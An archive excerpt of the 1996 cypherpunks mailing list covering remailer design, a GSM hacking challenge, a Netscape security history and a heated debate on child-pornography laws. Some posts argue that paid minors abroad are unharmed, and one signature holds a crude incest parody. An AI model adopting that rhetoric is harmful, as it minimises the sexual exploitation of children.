<199609110733.DAA04996@unix.asb.com> Message-ID: > WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" > [...] Yes; and what was the problem, again? ... -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From maldrich at grci.com Wed Sep 11 11:59:50 1996 From: maldrich at grci.com (Mark O. Aldrich) Date: Thu, 12 Sep 1996 02:59:50 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: Message-ID: On Wed, 11 Sep 1996, Stephan Schmidt wrote: > The German Company MobilCom wants to proove > that the German GSM networks D1,D2 and E+ are > secure. > > > If a hacker is able to phone using the number > 0171 / 3 28 99 66 in Germany with a hacked code, > the company will pay 100.000 DM (~65.000$) to a non > profit organisation of the hackers choice. > > Is someone able to do this ? :) While there's dubious wisdom in trying to tell Der Polizei, "I was just responding to an authorization that I found on the Internet that says it's OK to phreak your phones - honest," I'd also expect to get paid a hell of a lot more than $65 for doing a penetration test on their network. Sixty five bucks won't even pay the per diem, none the less a reasonable wage. And Der Polizei is *NOT* known for having a sense of humor about anything, at any time, with anyone. Remember, kids, they may look like shit in uniform, but those automatic weapons they carry are real, so's the ammo, and they know how to use both of 'em. And *I'll* decide if and when I want to give it to charity, just like I do with the rest of my salary, thank you.... ------------------------------------------------------------------------- |And if Dole wins and dies in office, they| Mark Aldrich | |could just pickle him and no one would | GRCI INFOSEC Engineering | |notice. It wouldn't be the first time we| maldrich at grci.com | |had a dill-dole running the country. | MAldrich at dockmaster.ncsc.mil| | -- Alan Olsen | | |_______________________________________________________________________| |The author is PGP Empowered. Public key at: finger maldrich at grci.com | | The opinions expressed herein are strictly those of the author | | and my employer gets no credit for them whatsoever. | ------------------------------------------------------------------------- From m5 at tivoli.com Wed Sep 11 12:02:37 1996 From: m5 at tivoli.com (Mike McNally) Date: Thu, 12 Sep 1996 03:02:37 +0800 Subject: Child Porn as Thoughtcrime In-Reply-To: Message-ID: <3236A627.510F@tivoli.com> Declan McCullagh wrote: > > Q: Is a collage of images of little girls (or boys, one presumes) in > > swimsuits, with apparent salacious intent, illegal? > > Under the Knox decision, yes. (Dancing girls in leotards are verboten.) Is this going to have some implications for broadcast of the women's gymnastic events in the next Olympics? ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From whgiii at amaranth.com Wed Sep 11 12:06:00 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Thu, 12 Sep 1996 03:06:00 +0800 Subject: [RANT]Education: Was Re: TWA 800 - Serious thread. In-Reply-To: <32367F80.41C67EA6@systemics.com> Message-ID: <199609111444.JAA13035@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <32367F80.41C67EA6 at systemics.com>, on 09/11/96 at 10:59 AM, Gary Howland said: >Greg Broiles wrote: >> >> At 03:30 PM 9/9/96 -0700, Dale Thorn wrote: >> >> >If govt. protects its "sources and methods", however nefarious, to the >> >extent that the public is never asked to assent to these methods (even >> >though a few of us know about them anyway), then the public doesn't have >> >to become overtly cynical about what's going on. >> >> But the public *is* asked to assent to those methods - your chance to vote >> on them is known colloquially as "jury duty". >Ah, but isn't "jury selection" the process of selecting those that don't >know they are judging the law as well as the case? The form of Government that our Founding Fathers created here in the US was based on the principle that the citizens were educated, informed, God fearing people with solid moral principles. We no longer have such a society if we ever did. Our citizens are for the most part uneducated, ill-informed, with the moral fiber that back in 1776 would have found the whole lot of them in stocks in the town square. The two major cause of this have been public education & TV. Now before I get flamed here let me explain my position. :) Over the past 40-50 yrs. public education has been going down hill. To receive the education that was once received from 12 yrs of school now requires 16 yrs. We are graduating greater and greater numbers of students that do not have the basic skills to survive in the workplace. There is little or no instruction on government, law, or the Constitution in school. The majority of citizens are ignorant of the law, of the Constitution (both State & Federal), of their local government. Incase you doubt this go out and ask some of your fellow citizens who is on their town counsel, county boards, state representatives. Ask them how local judges are selected. Who are their local judges and what are their positions on key political issues. Now on moral fiber & God fearing: Every society has recognize that there were some basic rules it's citizens had to live by inorder for them to survive. Now there can be some debate over individual rules or how they should be inforced but all societies have agreed that there were rules that the group as a whole had to live by. The three major ones: Don't Kill Don't Steal Don't Lie A majority of our current laws come from these 3 basic principles. Unfortunately our children are not being taught this. They are not being taught this by their parents, they are not being taught this by the schools, and the majority of airtime on TV is teaching them just the opposite. - -- - ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - Warpserver SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info - ----------------------------------------------------------- MR/2 Tag->Get OS/2 - the best Windows tip around! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjbcBY9Co1n+aLhhAQGloAP/beWoYIMGwzbyerMdgobciQZW6o/zAnpI dYUbWNY8pv40/YWWa4I0yHv31KVFySBAJZYb/WUmISQzwfXij4I+9GSmgYW2iri8 iIYl2RvCJsyBKz77Dgz1vKtAFOFOBNajcL9UqKKDOkwBtDu0PlHIOIoULn/ny8e3 cXIwTEt/Tbc= =81z7 -----END PGP SIGNATURE----- From chuck at nova1.net Wed Sep 11 12:44:15 1996 From: chuck at nova1.net (Chuck Thompson) Date: Thu, 12 Sep 1996 03:44:15 +0800 Subject: Child porn as thoughtcrime Message-ID: <1.5.4.32.19960911145102.0069fb04@mail.nova-net.net> The answer to the all the questions in the first set is yes, in this country anyway, if they are interpreted by the legal system as intending to incite illicit sexual acts, fantasies or obsessions about children. The fantasies or obsessions are assumed to lead to the illegal acts. >Whom is exploiting whom? Well, I'd say that anyone who benefits materially from the distribution of child porn is exploiting either the children, the pervert or both. >Which acts are crimes? Most of them, in this country. A few would be open to interpretation by the courts. >I submit that the various child porn laws we have in the United States are about the >clearest examples of "thoughtcrime" one can find, where the _thought_ is what is being >criminalized. I agree that it is an excellent example for your proposition regarding thoughtcrime. I disagree that the thought is what is illegal, consequently the subject doesn't work as the basis for your argument. *Thinking* about commiting a crime is not illegal, *acting* on your thought may be. Exp: I can think/ponder about killing my enemy. Until I do something about my thoughts, I'm not guilty of a crime. If I begin to discuss the commission of a crime with you, and it could be proven that the discussion was actually a part of the planning to commit such a crime, then, at the very least, we are guilty of conspiracy to commit a crime. Intent to commit an actual crime must be proven. >-- consumption of child porn creates a market >-- it harms the children >-- it's disgusting >-- etc. >Clearly the first argument applies to many other things. Why not outlaw pro-drug speech? Hold on here.. you are making an invalid comparison. To my knowledge, there is no law against speaking in favor of child porn, any more than there is against speaking in favor of drug usage. It against the law to *use* either of them. >The second argument, that children are actually harmed, is vitiated by the fact that >much so-called child porn comes from countries where the actors are of legal age. >How can a 14-year-old Thai girl be "harmed" when what she is bing paid to do is >perfectly legal in Thailand? There you go again.. being legal does not, in any way, mitigate it's harmfulness. There may be places on this earth where it is legal to convince a two-year-old to perform some sexually gratifying act by giving her a piece of candy. Just because it is legal doesn't mean it won't scar the child. The effect on the child is what is illegal, in this case. >And the case of morphings, drawings, stories, etc., clearly involve no actual children, >so the argument that children are harmed is empty. The argument is not dependent upon whether or not actual children are used, any more than whether or not an actual gun is used in a robbery - the net effect is the same. Children are harmed by the promotion of child porn because it leads to the abuse/exploitation of kids. >As to me argument that images, stories, etc., are disgusting, amoral, inappropriate, >etc., well, perhaps. But what is the legal and constitutional basis for restricting >such things? Many opinions and actions are vile and disgusting, but are not illegal. >Under what interpretation of the Constitution is the creation of a drawing depicting, >say, a 7-year-old girl having sex with someone or something a criminal act? The >obscenity laws? First, you must separate opinions from actions. In this country, opinions are not ever illegal. Some actions are. The illegality is probably (I'm out of my depth here, not being a lawyer or student of the constitution) based on various laws which would fall under the umbrella of "obscenity". We, as a society, have the right to formulate, pass and enact legislation which we deem to be in our best interests. And, as long as the laws which are passed do not violate our constitution, the underlying basis for passing such laws, the fact that an individual may not agree with the law does not give that individual the right to violate it without consequence. In other words, an individual may be able to violate a law without consequence, if he can prove that the law is unconstitutional. >My point is this: For anyone who claims that "thoughtcrime" is something the Evil >Empire specialized in, i.e., totalitarian communist regimes, look to the enforcement of >laws about what can be viewed or accessed from the United States. Thoughtcrime. Your case is weak, because it is based on the false premise that the illegality of child pornography equates to illegality of thought. It is overt action which is illegal, not thought. Let those who believe that they have a constitutional right to "keep and bear child pornography" violate the various laws and see if they can prove that their constitutional rights are violated by the law which proscribes such things. By the way, Tim, I found your "translation" to be offensive, crude and deliberately provocative. I do, however, support your right to publish it. Generally speaking, I find your missives to be enlightening and appreciate the way they cause me to think carefully about my position on various topics. Regards, Chuck Thompson From nobody at cypherpunks.ca Wed Sep 11 12:56:20 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Thu, 12 Sep 1996 03:56:20 +0800 Subject: 'robert' and his 'hipcrime' web site Message-ID: <199609111609.JAA25770@abraham.cs.berkeley.edu> Have you considered who is funding this "hipcrime" site? Web sites aren't terribly expensive these days, but someone paid at least a few hundred dollars in set-up fees for this. Now, I realize that most artists really just like to draw, and will spend money on their art projects without expecting any kind of benefit; that is not unusual. What is unusual is the disclaimer and its corporate mentailty, and the "anarchist info". It's obvious that this guy's true passion is fractals and raytracing. He threw in some bomb-making stuff, but he scanned it out of a book and probably never tried it. Compared to the rest of the site, it looks like an afterthought. Someone who was really interested in chemistry would have taken the time to retype the info and add their own comments. He had a reason to have some "anarchist" info on there but he's not really interested in it. So basically this guy is a mathematician/artist trying to pretend he's an anarchist. Same goes for the remailers. He claims he likes remailers and anonymity, but he's lying. Anyone who really liked remailers/anonymity/privacy would have pages and pages about how to use remailers, and why privacy is a good thing. He has a reason he needs to be anonymous, but it's not because he supports privacy. He publishes a PGP key, because he wants to pretend he's an anarchist, and Louis Freeh told him that all evil terrorist organizations use PGP. But he doesn't like PGP, he doesn't advocate PGP, and he doesn't tell you where to get PGP. So we have a guy, probably with an education in mathematics, who likes abstract art. Not what would generally be considered a political figure. But there's something else there - something that doesn't want to be seen, something that is very strongly law&order, something that doesn't understand the anarchy of the net, and fears it. Something that has the money to fund lots of little pet projects. Is robert at precipice.v-site.net just a useful idiot who found someone who will fund his fractal creations? Or is he a willing participant? I guess it doesn't matter really. Someone here doesn't like us... didn't like us before Hipcrime went online, and still doesn't like us. But now at least he's got our attention. From frantz at netcom.com Wed Sep 11 13:25:50 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 12 Sep 1996 04:25:50 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailer protocols) Message-ID: <199609111653.JAA03530@netcom8.netcom.com> At 7:26 PM 9/10/96 -0700, Lance Cottrell wrote: >It is a good idea, but it does involve another whole level of >infrastructure. I am not at all sure that message pools are not a better >system. Your suggestion requires The client to do a lot of work, and for >the remailers to store many keys for indefinite periods. You certainly know the details of Mixmaster remailers better than I do. In a last defense, while the protocol requires Alice's program to do a lot of work, it still could be fairly easy for Alice herself to use. In addition, the remailer could set a definite limit to the lifetime of the keys, since Alice is also setting such a limit. If Alice specifies their lifetime when she sends them, then the path would automatically dissolve without action on her part. Let me float one more hair-brained idea. I think Tim May is right in saying that the most secure response technique is the one in Blacknet. i.e. The response are posted to some public bulletin board, and then Alice reads them at her leisure. I see two problems with this approach: (1) It doesn't scale well, and (2) Alice's reading of the response may be detected. (I think of the vans in Great Britain which listen to the local oscillator frequency of TV sets to find what people are watching.) Perhaps both of these problems could be solved by something like a stock photo service which uses digital watermarks to discourage copyright infringement. Since it is using digital watermarks, each copy of a particular photo would be different, providing the opportunity to stego an encrypted message in the photo. If Alice regularly spent $.05 of Ecash for a new desktop background photo, it would be hard to determine which had stegoed messages. The service might even make money on just the above-board sales. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From cmefford at avwashington.com Wed Sep 11 13:39:00 1996 From: cmefford at avwashington.com (Chip Mefford) Date: Thu, 12 Sep 1996 04:39:00 +0800 Subject: Child Porn and Thought Crime Message-ID: If it is a crime to posses photograhic child pornograhy, and this crime is tested in court., , Then is it a crime for a sightless person to posses photograhic child pornograhy? If so, than this matter needs to be thought out some more. If no (by test of court, paper is more or less meaningless) than it is thought crime. From hallam at ai.mit.edu Wed Sep 11 13:42:30 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Thu, 12 Sep 1996 04:42:30 +0800 Subject: Child Porn as Thoughtcrime In-Reply-To: <515ldn$gfp@life.ai.mit.edu> Message-ID: <3236F103.6201@ai.mit.edu> Declan McCullagh wrote: > Not so, says Bruce Taylor, the chief architect of the CDA and a > professional cyber-scaremonger. The former Federal porn-prosecutor > believes that "not all censorship is bad." > > "Foreign countries have an obligation to restrict obscenity and child > pornography on the Internet by the treaty of 1911," says Taylor. "It's > an agreement between the states to cooperate and to use international > laws to prosecute obscenity." And to Taylor, books and copies of > Penthouse magazine can be obscene. The status of such treaties governing internal policies is very suspect. In the first place a great many of the countries that signed the original treaty will not exist. Technically neither Germany nor France exist in that form since both have been reformed under entirely new constitutions. In addition it is always open to a soveriegn nation to abrogate a treaty. This may entail sanctions but unless the UN were involved it would be unlikely in the extreeme that any significant effect would be caused. At this stage a UN resolution would seem more relevant than a treaty from 1911 intended to entrench Victorian morality. As a European I note that the US happily gives itself the "right" to unilaterally withdraw from treaties of far more significance such as SALT-II or GATT on entirely spurious grounds. The US has also withdrawn from the World court after being found guilty of terrorist acts in Nicaragua. As such the likes of Bruce Taylor don't exactly have a strong case. If the US thinks it can pick and choose amongst its international obligations then other countries are likely to consider they have equal rights to do so. I don't think that kiddie porn is likely to be the breaking factor however. Anyone who has been following the European news will understand that recent events in Belgium makes that exceptionaly unlikely. I think it most unlikely that any President would be foolish enough to send Mr Taylor over to explain US demands. He is transparently disingenuous and conveniently ill-informed. The small town American parochialism he represents is even less popular in Europe than in California or amongst East coast intellectuals. Where I see a more likely breaking point is over cannabis which many countries are finding disproportionately expensive to control. Since the US is rapidly becomming the worlds largest supplier demands from that quarter may be treated with less than full concern. Spain and the Netherlands have both reformed their drug laws and the UK may well end up doing so in the long term, reform of the prostitution laws will probably come first however. Phill From jk at stallion.ee Wed Sep 11 13:45:31 1996 From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=) Date: Thu, 12 Sep 1996 04:45:31 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: Message-ID: Wed, 11 Sep 1996, Mark O. Aldrich wrote: > On Wed, 11 Sep 1996, Stephan Schmidt wrote: > > > the company will pay 100.000 DM (~65.000$) to a non > > OK to phreak your phones - honest," I'd also expect to get paid a hell of > a lot more than $65 for doing a penetration test on their network. Sixty > five bucks won't even pay the per diem, none the less a reasonable wage. Actually 65.000$ is pronounced sixty five thousand dollars not sixty five dollars, at least in Eastern and Central Europe. J�ri Kaljundi AS Stallion jk at stallion.ee From andy at CCMSD.chem.uga.edu Wed Sep 11 13:46:46 1996 From: andy at CCMSD.chem.uga.edu (Andy Dustman) Date: Thu, 12 Sep 1996 04:46:46 +0800 Subject: 'robert' and his 'hipcrime' web site In-Reply-To: <199609111609.JAA25770@abraham.cs.berkeley.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 11 Sep 1996, John Anonymous MacDonald wrote: > Have you considered who is funding this "hipcrime" site? Web sites aren't > > So we have a guy, probably with an education in mathematics, who likes > abstract art. Not what would generally be considered a political figure. > But there's something else there - something that doesn't want to be seen, > something that is very strongly law&order, something that doesn't > understand the anarchy of the net, and fears it. Something that has the > money to fund lots of little pet projects. Is robert at precipice.v-site.net > just a useful idiot who found someone who will fund his fractal creations? > Or is he a willing participant? I guess it doesn't matter really. Can you say, "COINTELPRO"? Howzabout "FBI"? Andy Dustman / Computational Center for Molecular Structure and Design / UGA ===== For PGP public key: finger andy at neptune.chem.uga.edu | pgp -fka ===== Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net http://charon.chem.uga.edu/~andy mailto:andy at CCMSD.chem.uga.edu <}+++< -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjb1HC0jMb7JduJJAQF/FwQAmpij7GkyttnQ3zsl2PgTfMrONayo6QG1 mV+hQ7Mwmek4MdAyJum4OWCi7NMmzdseo0kNeI/1j3Yb3sdSKqOeDJe3TL5U/VQq lftMQFF9pRVreANvFxVRUllcjZycAweliouOOGpqdEwBra1IGDFp1/gbfxyRRNVq E9vI6pfSQI4= =XGKk -----END PGP SIGNATURE----- From tcmay at got.net Wed Sep 11 13:50:40 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 04:50:40 +0800 Subject: Digital rights organisation Message-ID: At 9:46 AM 9/11/96, Stephan Schmidt wrote: >Hi, > >thinking about what happend in Germany, >are there any 'digital rights' organisations >in Germany ? > >If not, we would like to found one. >Are there any international orgs (EFF?,...) >who can help us ? A wonderful idea, Stephan! You might try contacting EFF to see if a German branch exists (though EFF is not a strongly member-oriented organization, though people tell me this may be changing). Germans should embrace the idea that the cure for bad speech is _more_ speech. Specifically, for the current German concerns, the "cure" for speech by semi-Nazi skinheads and Holocaust deniers is free and open speech. Hard to deny the Holocaust when web sites have thousands of pictures, when archives exist. (And when speech saying the Holocaust "never happened" is outlawed, a certain fraction of the population thinks it's cool and chic to engage in this speech! Human psychology and all. This is probably what 90% of the skinheads are all about, plus some run of the mill hatred toward Turks and other immigrants who they think are taking away their jobs....) I understand that Germans have free speech in a lot of areas, and have less censorship of sexual material than the U.S. has (television, especially). But the areas where they _do_ censor, such as discussion of the Second World War and related issues, are the ones the world see. Germany needs to embrace completely free speech. This is the best way to ensure that another dictator like Hitler does not get elected to power. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Wed Sep 11 14:13:37 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 05:13:37 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati Message-ID: At 2:43 PM 9/11/96, Dr.Dimitri Vulis KOTM wrote: >tcmay at got.net (Timothy C. May) writes: >> And who might these people be? I suggest you name them, as I have not even >> mentioned your name to anyone. You don't rate a complaint from me. > >E.g. Kelly Goen is one of the people who told me that Tim May's been >complaining about my alleged "spit" posts. I've only spoken to Kelly Goen _once_ in many months, and he was calling from his cellphone and we only talked for a few minutes. I don't recall mentioning Vulis. So, who are these "various people"? >Note that Kelly's not on this mailing list (unlike at least two other >people who said to me that Tim complained to them off-list) and that >most of the posts Tim complains about are obvious forgeries. Who are these "at least two other people"? I _do_ think you're a loon. Not in the endearing sense of some net.loons, but in the peculiar kind of foaming-at-the-mouth lunacy that I've seen in several Russian and Armenian emigres. --TCM We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Wed Sep 11 14:17:34 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 05:17:34 +0800 Subject: Child porn as thoughtcrime Message-ID: At 2:51 PM 9/11/96, Chuck Thompson wrote: >The answer to the all the questions in the first set is yes, in this country >anyway, if they are interpreted by the legal system as intending to incite >illicit sexual acts, fantasies or obsessions about children. The fantasies >or obsessions are assumed to lead to the illegal acts. You later mention that "Intent to commit an actual crime must be proven." Saying that fantasies or obsessions are assumed to lead to crimes is the same as thoughtcrime. >>Clearly the first argument applies to many other things. Why not outlaw >pro-drug speech? > >Hold on here.. you are making an invalid comparison. To my knowledge, >there is no law against speaking in favor of child porn, any more than there >is against speaking in favor of drug usage. It against the law to *use* >either of them. Writing a pro-drug article on the joys of marijuana use, on the pleasures of opium, on the "naturalness" of various herbs, etc., would seem to me to be essentially "drug pornography" (by the standards of porn laws). To use your quote, "The fantasies or obsessions are assumed to lead to the illegal acts." (By the way, the language of pro-censorship anti-pornography crusaders is being adopted by other special interest groups. Sarah Brady has called for restrictions on what she calls "gun pornography," and there are a lot of people trying to "clean up" television and movies by controlling "the pornography of violence." By your various arguments that "fantasies and obsessions" can lead to later crimes, are they not behaving as you would wish them to? If thoughtcrime about how cool guns are can be eliminated, we can save the children from gun violence!) ... (my quote left in for context) >>The second argument, that children are actually harmed, is vitiated by the >fact that >much so-called child porn comes from countries where the actors >are of legal age. >>How can a 14-year-old Thai girl be "harmed" when what she is bing paid to >do is >>perfectly legal in Thailand? > >There you go again.. being legal does not, in any way, mitigate it's >harmfulness. There may be places on this earth where it is legal to ??? Are you saying that the legal system should punish people for perfectly legal behavior which is "harmful" (putatively, in a future or "inspiration" sense) to people? (The civil litigation community is of course in agreement with you: Sue gun manufacturers for crimes committed using their guns. Sue the makers of rock climbing equipment for the harm done to rock climbers, even though voluntary. Sue the horseback riding farms for falls suffered by riders. Sue tobacco companies for the lung cancer of smokers. Sue MacDonald's for the high cholesterol-induced heart attacks of customers. Sue the director of "Natural Born Killers" on behalf of victims murdered in "copycat" cases. Sue the author of "Lolita" for inspiring sex crimes. Sue.....) >>And the case of morphings, drawings, stories, etc., clearly involve no >actual children, >so the argument that children are harmed is empty. > >The argument is not dependent upon whether or not actual children are used, >any more than whether or not an actual gun is used in a robbery - the net >effect is the same. Children are harmed by the promotion of child porn >because it leads to the abuse/exploitation of kids. You seem to be arguing for class-based rights and wrongs. Does promotion of capitalism lead to the abuse and exploitation of workers? Perhaps we could outlaw pro-capitalist writings. Does pro-drug speech lead to drug abuse and misery? (Probably it does, of course.) As I asked earlier, should pro-drug speech be outlawed? (You earlier implied that of course it should not, that pro-drug speech is protected. But if it probably leads to consumption of drugs, as nearly everyone on both sides of the issue will likely agree, isn't it the same as your point about child porn?) .... >First, you must separate opinions from actions. In this country, opinions >are not ever illegal. Some actions are. The illegality is probably (I'm Do you mean _unspoken opinions_? If so, I agree--after all, if never spoken, the opinions are unknown to others, not even to Big Brother. If, however, you mean that "_expressed_ opinions are not ever illegal," this is clearly false. Sedition laws are still on the books, as are laws outlawing the "advocacy" (an uttered opinion, surely) of various things. (I believe it was Eugene Debs who spent time in prison for expressing the opinion that the United States should not be in the Great War, or that the draft should be abolished, or something related to this.) >which we deem to be in our best interests. And, as long as the laws which >are passed do not violate our constitution, the underlying basis for passing ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Such as the "Congress shall make no law" language in the most important items in the Bill of Rights? Just where in the Constitution is it said that speech may be limited so as to reduce "fantasies and obsessions"? I read the Constitution as saying this may not be done, and I read most later Supreme Court interpretations as saying that limitations on speech may only be implemented if there is a compelling need to protect other basic rights (a la the infamous "falsely shouting "Fire!" in a crowded theater"). >Your case is weak, because it is based on the false premise that the >illegality of child pornography equates to illegality of thought. It is >overt action which is illegal, not thought. None of the acts I described in my piece involved _actions_ against children in the United States. Drawing a picture or writing a story is _speech_ (in the accepted definition of speech, thought, expression of views, literature, etc.). Morphing an image of Raquel Welch is speech. And so on. This is not sophistry, this is a statement of what is really happening. No actual child is involved. If one argues that speech which may lead to later crimes, by other people, can and should be outlawed, then Pandora's Box is truly opened for limiting vast amounts of speech. Words _do_ have impact, tremendous impact in fact. Free speech _can_ and _does_ lead to others committing crimes, killing themselves, acting stupidly, undermining society, even having "fantasies and obsessions." Get used to it. >By the way, Tim, I found your "translation" to be offensive, crude and >deliberately provocative. I do, however, support your right to publish it. What if it inspires a young girl to think more positively about having an incestuous relationship with her father? Mightn't it inspire "fantasies and obsessions"? And under the CDA, it's probably illegal, given that various 13- and 14-year-olds are reading this list. --Tim May -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. [excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From frantz at netcom.com Wed Sep 11 14:35:33 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 12 Sep 1996 05:35:33 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <199609111822.LAA15265@netcom7.netcom.com> At 8:48 PM 9/10/96 -0700, Declan McCullagh wrote: >On Tue, 10 Sep 1996, Timothy C. May wrote: > >> Q: Is a drawing of a child engaging in a sexual act an illegal item? > >Under the original Hatch bill, yes. Certainly under the revised one. Of >course, Hatch's proposal goes even farther. There's no "sex act" requirement. >Judy Krug from the ALA testified about this, opposing Bruce Taylor. > >> Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old >> illegal? > >Even under the original Hatch bill, yes. It seems to me that the logic of these answers would make the movie, "Carried Away" illegal. According to a Boston Globe review (reprinted in the local rag), "... his character cheats on his longtime girlfriend with a new student who's only 17, ..." Depending on how this is depicted in the movie (Rated R), it seems to me that this could go over Hatch's line. (BTW, the review rates the movie 3 stars out of a possible 4.) ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From jlasser at rwd.goucher.edu Wed Sep 11 14:40:10 1996 From: jlasser at rwd.goucher.edu (Moltar Ramone) Date: Thu, 12 Sep 1996 05:40:10 +0800 Subject: 'robert' and his 'hipcrime' web site In-Reply-To: <199609111609.JAA25770@abraham.cs.berkeley.edu> Message-ID: On Wed, 11 Sep 1996, John Anonymous MacDonald wrote: > Have you considered who is funding this "hipcrime" site? Web sites aren't > terribly expensive these days, but someone paid at least a few hundred > dollars in set-up fees for this. A few hundred dollars? Probably not. There's the domain name registration (perhaps, depending on when the name was registered -- I don't care enough to find out), and maybe $20/month to some other guy. Perhaps more, but not necessarily. > It's obvious that this guy's true passion is fractals and raytracing. > He threw in some bomb-making stuff, but he scanned it out of a book and > probably never tried it. Compared to the rest of the site, it looks like > an afterthought. Someone who was really interested in chemistry would > have taken the time to retype the info and add their own comments. He > had a reason to have some "anarchist" info on there but he's not really > interested in it. So basically this guy is a mathematician/artist trying > to pretend he's an anarchist. Like... oh... I dunno... una-something... :-) To be an "anarchist" has nothing to do with violence, necessarily, though. Ghandi was an anarchist, of course, as are many other people (such as myself) who disclaim violence as a tactic. > So we have a guy, probably with an education in mathematics, who likes > abstract art. Not what would generally be considered a political figure. > But there's something else there - something that doesn't want to be seen, > something that is very strongly law&order, something that doesn't > understand the anarchy of the net, and fears it. Disagree strongly. Are you aware of the source of the name 'hipcrime'? It's from John Brunner's novel _Stand_On_Zanzibar_ (A _great_ book, btw), and describes a cynical, hipster-societal dropout philosophy (or at least style) that is inclined to look at people as no more than sheep. Applying this to the 'net populace is perhaps (I hesitate somewhat to apply the term) misanthropic, but not necessarily law & order. Again, unabomber comparisons are obvious. Still, like computer virii, the internet worm, all the promised intelligent agents and nano-mites we've been promised (which the hipcrime bot could certainly be seen as another precursor of, at least as far as intelligent agents go), there's a certain abstract beauty to the scheme, and a certain pathos. I'm reminded of the limits to growth studies which showed islands exceed their capacity to carry a particular species, and the stunning sudden decline soon after. (Come to think of it, that analogy might cover the remailer network) ---------- Jon Lasser (410)532-7138 - Obscenity is a crutch for jlasser at rwd.goucher.edu inarticulate motherfuckers. http://www.goucher.edu/~jlasser/ Finger for PGP key (1024/EC001E4D) - Fuck the CDA. From pgut001 at cs.auckland.ac.nz Wed Sep 11 14:40:35 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Thu, 12 Sep 1996 05:40:35 +0800 Subject: [Long] A history of Netscape/MSIE problems Message-ID: <84245818912499@cs26.cs.auckland.ac.nz> I've been putting together a writeup on problems in web browsers, mainly the history of the Netscape RC4/40 break, random number bugs, and problems with Java, as part of a longer paper I'm doing on crypto from a non-US perspective. A lot of the information in this section of the paper has come from this list, so I thought I'd post it for comment and in case anyone found it interesting (please don't post it to web sites or anything until the paper is actually published). If anyone has anything to add, corrections to make, etc, please let me know. Peter. The Netscape SSL Break and its Implications ------------------------------------------- The Secure Socket Layer (SSL) protocol, after a somewhat shaky start (version 1 was broken within 10 minutes of being unveiled [Hallam-Baker 1996]), and an attempt by Microsoft to promote a similar but competing protocol [Benaloh 1995], has more or less edged out any other protocols to become the standard for securing HTTP sessions (an overview of SSL and various other proposed WWW security mechanisms is given in [Reif 1995a]). SSL uses a combination of RSA and, usually, a proprietary (until it was reverse-engineered, of which more later) algorithm called RC4 to provide confidentiality, data integrity, and authentication. Since it was built into what was by far the most popular web browser, and because of Netscape's policy of giving away the software, it immediately gained widespread popularity. No details on RC4 were published, but the fact that it was designed by a very good cryptographer was enough to reassure most people. RC4 is used in dozens of commercial products including Lotus Notes, a number of Microsoft products such as Windows for Workgroups, Windows 